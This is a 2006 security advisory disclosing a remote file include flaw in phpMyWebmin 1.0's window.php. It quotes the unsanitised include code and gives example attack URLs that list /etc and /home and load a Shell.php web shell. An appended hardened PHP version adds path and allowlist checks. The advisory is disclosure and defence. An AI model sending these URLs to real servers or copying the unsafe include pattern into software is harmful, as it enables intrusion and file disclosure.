
# Title : phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability
# Published : 2006-09-28
# Author : Kernel-32


#######################################
+PHP MyWebMin 1.0 Remote File Include
+Advisory #5
+Product: PHP MyWebMin
+Develop: www.josh.ch/joshch/php-tools/phpmywebmin,download.html
+Vulnerable: Remote File Includes
+Risk: High
+Class: Remote
+Discovered: by Kernel-32
+Contact: kernel-32@linuxmail.org
+Homepage: http://kernel-32.blogspot.com
+Greetz: BeLa ;)
########################################

Vulnerable File: window.php
$ordner = opendir("$target");
?>

and

include("$target/preferences.php");

if($action != "")
{
include("$action.php");
?>

Examples:
http://site/path/window.php?target=/etc
http://site/path/home.php?target=/home
http://site/path/window.php?action=Shell.php
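
A hardened form of the two patterns quoted above, as an added example that is not part of the original advisory or of phpMyWebmin. BASE_DIR, the action names, and the actions/ directory are assumptions for illustration; preferences.php is assumed to sit beside the script.

```php
<?php
// Added example, not phpMyWebmin code. BASE_DIR and the action names are
// assumptions chosen for illustration.
const BASE_DIR = '/var/www/webmin-data';             // hypothetical browsable root
const ALLOWED_ACTIONS = ['list', 'edit', 'upload'];  // hypothetical action scripts

// Resolve a user-supplied directory; return null unless it stays under BASE_DIR.
function resolve_target(string $target): ?string
{
    // Reject stream wrappers (http://, ftp://, php://, ...) and NUL bytes outright.
    if (strpos($target, '://') !== false || strpos($target, "\0") !== false) {
        return null;
    }
    $base = realpath(BASE_DIR);
    $real = realpath(BASE_DIR . '/' . $target);  // collapses ../ and symlinks
    if ($base === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Compare with a trailing separator so /var/www/webmin-data2 cannot match.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real !== $base && strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Map a user-supplied action to a script path only if it is on the allowlist.
function resolve_action(string $action): ?string
{
    return in_array($action, ALLOWED_ACTIONS, true)
        ? __DIR__ . '/actions/' . $action . '.php'
        : null;
}

// Read the parameters explicitly instead of trusting request-populated globals.
$target = resolve_target((string) ($_GET['target'] ?? ''));
$action = resolve_action((string) ($_GET['action'] ?? ''));
if ($target === null) {
    http_response_code(400);
    exit('invalid target');
}
$ordner = opendir($target);
require __DIR__ . '/preferences.php';  // fixed path, never built from the request
if ($action !== null) {
    require $action;
}
```

With these checks, target=/etc resolves to a path under BASE_DIR or is rejected with a 400, and an action value outside the allowlist is never passed to require.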

# www.Syue.com [2006-09-28]